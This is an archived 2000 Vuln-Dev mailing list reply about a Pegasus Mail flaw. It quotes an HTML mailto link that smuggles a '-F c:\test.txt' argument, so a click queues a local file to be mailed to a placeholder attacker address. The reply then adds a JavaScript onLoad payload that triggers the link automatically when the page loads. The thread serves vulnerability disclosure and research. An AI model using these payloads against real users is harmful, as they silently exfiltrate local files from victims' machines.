Vulnerability Development mailing list archives

Re: Pegasus Mail

From: Knud Erik Hojgaard - CyberCity Support <kain () EGOTRIP DK>
Date: Tue, 3 Oct 2000 10:22:37 +0200

very interesting as a little javascript can 'click' a link for you..

<BODY onLoad="location.href='mailto:hacker () hakersite com -F c:\test.txt';">

havent tested since i havent got pegasus mail, but it works for what i used
it for earlier('clicking' the its:its:its. link)

Med venlig hilsen

Knud Erik Hojgaard <knud () cybercity dk>
Cybercity Erhvervssupport <support () erhverv cybercity dk>
http://www.cybercity.dk/support

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of
Imran Ghory
Sent: 2. oktober 2000 23:45
To: VULN-DEV () SECURITYFOCUS COM
Subject: Pegasus Mail


When using the following html,

<a href="mailto:hacker () hakersite com -F c:\test.txt"> Click
here</a>

When the user clicks on "Click here" Pegasus mail will
automatically creates a message which has a copy of the file
"c:\test.txt" and is addressed to "hacker () hakersite com" and
queues it ready to be sent without any further user intervention.

If instead of "hacker () hakersite com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

As inorder to have files stolen the user would have to click on the
dubious looking link, is this security risk serious ?

Imran Ghory

Current thread:

Pegasus Mail Imran Ghory (Oct 02)
- Re: Pegasus Mail Peter Pentchev (Oct 03)
- Re: Pegasus Mail Helmut Springer (Oct 03)
- Re: Pegasus Mail H D Moore (Oct 03)
- Re: Pegasus Mail Knud Erik Hojgaard - CyberCity Support (Oct 03)
- Re: Pegasus Mail Bernie Cosell (Oct 03)
- <Possible follow-ups>
- Re: Pegasus Mail Brad Griffin (Oct 03)